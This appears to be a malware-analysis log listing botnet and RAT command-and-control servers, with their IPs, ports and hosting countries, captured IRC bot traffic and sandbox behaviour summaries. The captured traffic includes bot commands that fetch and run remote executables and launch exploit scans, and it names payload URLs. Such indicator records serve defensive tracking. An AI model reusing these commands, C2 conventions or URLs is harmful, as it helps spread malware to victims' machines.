irc.accesox.net (botnet hosted in France Paris Ovh Sas)

Remote Host        Port Number
222.122.46.122     80
91.121.96.162      6667
91.121.96.162      7000

NICK n{USA|XP}671615
NICK {USA|XP}077961
USER 0779 “” “TsGh” :0779
USER 7334 “” “TsGh” :7334
JOIN ##bote##
PRIVMSG ##bote## :[Update]: Updating to: http://www.lespel.co.kr/images/USB_Vlad.exe
JOIN #Weed
PRIVMSG #Weed : New PC Infected.
MODE pLagUe{USA}32852 -ix
MODE #Weed -ix
NICK pLagUe{USA}32852
USER SkuZ * ok TeaM UniX b0at ...

aaaa.forexinvest4.com (botnet hosted in Russian Federation Vline Ltd)

aaaa.forexinvest4.com ip: 109.196.130.66
aaaa.forexinvest4.com ip: 109.196.130.50
aaaa.forexinvest4.com:6939

PASS laorosr
Channel#dpi
Channel#!
NICK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is ‘.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 ...

server95527.santrex.net (botnet hosted in Germany Berlin Netdirekt E.k)

Remote Host        Port Number
212.95.32.241      6667

NICK {XPUSA900275}
MODE {XPUSA900275} -ix
JOIN ##spam##
PONG irc.priv8net.com
USER COMPUTERNAME * 0 :COMPUTERNAME
NICK {XPUSA60072}
Now talking in ##security-check##
Topic On: [ ##security-check## ] [ .part ##security-check## ]
Topic By: [ Z-3R0 ]

Hosting information: http://whois.domaintools.com/212.95.32.241

nokia2mon2.markaz-royal.net (shellbooter hosted in Saudi Arabia Riyadh Dsl Home Subscribers_dynamic Ips)

Remote Host        Port Number
77.30.55.134       3086

Other details
* The following port was open in the system:

Port    Protocol    Process
1051    TCP         svchost.exe (%AppData%\Microsoft\svchost.exe)

Registry Modifications
* The following Registry Key was created:
  o HKEY_CURRENT_USER\Software\eeptfs2
* The newly created Registry Values are:
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Startup = “%AppData%\Microsoft\svchost.exe”
so that svchost.exe runs every time Windows ...

websiteex.com (botnet hosted in United States Chicago Hostforweb Inc)

Remote Host        Port Number
174.37.200.82      80
63.135.80.224      80
63.135.80.46       80
66.220.147.11      80
96.17.164.187      80
64.202.102.10      1234

PASS xxx
MODE NEW-[USA|00|P|42884] -ix
JOIN #!nn! test
PONG 22 MOTD
NICK NEW-[USA|00|P|42884]
USER XP-9086 * 0 :COMPUTERNAME

Hosting information: http://whois.domaintools.com/64.202.102.10

cancanmt2.no-ip.biz (RAT hosted in Turkey Antalya Tt Adsl-ttnet-ulus-static)

cancanmt2.no-ip.biz: type A, class IN, addr 95.9.90.39
Dest Port: 100

Summary
* Creates temporary files
* Queries a list of all running processes
* Performs DNS lookups
* Enables debug privileges
* Creates files inside the system directory
* Loads the internet automation component (ieframe.dll)
* Creates an autostart registry key
* Checks for debuggers (Devices)
* Creates a thread in another existing process (thread ...